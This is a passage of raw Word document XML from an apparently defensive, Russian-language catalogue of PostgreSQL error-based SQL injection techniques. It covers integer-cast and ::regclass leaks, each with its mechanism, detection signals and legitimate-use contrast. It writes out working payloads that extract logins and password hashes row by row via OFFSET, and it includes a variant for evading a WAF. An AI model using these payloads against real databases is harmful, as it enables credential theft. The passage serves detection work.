        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid input syntax for type integer: "admin|$2b$12$abc...xyz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B06800F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эквивалентный postfix-каст для случаев, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CAST(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> режется WAF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036BA043" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT (SELECT login FROM users LIMIT 1)::int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFD187" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Постраничный обход через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для извлечения всех строк:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554601CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CAST((SELECT login || '|' || password_hash FROM users ORDER BY id OFFSET 0 LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C02CE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(SELECT CAST((SELECT login || '|' || password_hash FROM users ORDER BY id OFFSET 1 LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87776D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD84CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Каждый запрос возвращает HTTP 500 с одной строкой данных в теле ошибки. Атакующий извлекает таблицу построчно за столько запросов, сколько в ней строк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCEED6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL применяет cast через input-функцию целевого типа — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int4in()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/utils/adt/int.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Функция парсит строку и при провале вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>errmsg("invalid input syntax for type %s: \"%s\"", ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с включением исходной строки в текст ошибки. Длина включаемой строки в PG не ограничена — в отличие от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (63 байта NAMEDATALEN), числовые касты возвращают значение целиком. Подзапрос </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... FROM users LIMIT 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется внутри планировщика без специальных проверок — это легитимная скалярная конструкция. Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для нескольких полей превращает множественные значения в одну строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C36854" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Application-роль должна иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на таблицу-источник. Главное условие — наличие канала доставки ошибки (см. 3.2.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78861729" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Касты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CAST(... AS int)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречаются в SQL постоянно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B336605" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDDBDD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каст применён к подзапросу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ... FROM other_table)</w:t>
      </w:r>
      <w:r>
        <w:t>, а не к колонке текущего FROM. Легитимный код кастит свои колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC8836D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В подзапросе используется конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нескольких колонок — индикатор склейки данных для упаковки в одну ошибку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66A76B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каст применён к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_database()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_setting(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Легитимная необходимость кастить эти функции к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не встречается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26317DE7"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pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появляется поток запросов с одинаковой формой, отличающихся только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или подстрокой в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B7CC13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG. Текст ошибки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type integer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабилен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CE7D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.2, 3.2.3, 3.2.5, 3.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7155E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Extracting data via verbose error messages; HackTricks: PostgreSQL injection; PostgreSQL Documentation: Type Conversion, Error Message Reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBB76C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.2 `::regclass` — leak через несуществующее отношение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8A93C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'name'::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пытается разрезолвить строку как имя отношения. Если такого отношения нет, PG выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "&lt;name&gt;" does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это полная исходная строка (с учётом truncation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F415E6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Тот же, что в 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D070B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80CC48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Базовое извлечение:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429E203" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT (SELECT current_user)::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D070AC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F3966"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(SELECT current_user)::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9B966" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ответ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA527F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: relation "app_user" does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9BC72D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Гарантия несуществования через префикс — на случай, если значение случайно совпадёт с реальным именем таблицы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934D88B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT ('x_' || (SELECT login FROM users LIMIT 1))::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B644C78"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('x_' || (SELECT login FROM users LIMIT 1))::regclass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D6A116" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEAED2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: relation "x_admin" does not exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB5825C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> То же, что в 3.2.1, но с принципиальным ограничением длины: имена отношений в PG ограничены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NAMEDATALEN - 1 = 63</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> байтами. Всё, что длиннее, молча обрезается перед попыткой резолва — атакующий получит ошибку для усечённой строки. Для длинных hashes/tokens этот канал требует chunking через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(..., 1, 60)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56D59E"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regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это OID-тип, в качестве input-функции использующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regclassin()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Функция парсит строку как имя relation и вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RangeVarGetRelid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если объект не найден — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>errmsg("relation \"%s\" does not exist", ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Truncation до 63 байт происходит в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>truncate_identifier()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ещё до резолва. Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> популярен у атакующих не из-за уникальных возможностей (по сравнению с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> он строго слабее), а из-за читаемости payload-а и обхода фильтров, заточенных на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CAST(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DF235" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Канал доставки ошибки (3.2.5). Значение для extraction не должно превышать 63 байта — иначе нужен chunking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49518CA2"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::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встречается в DBA-скриптах для безопасной валидации имени таблицы, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> output, в миграциях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CF13A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320F2626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
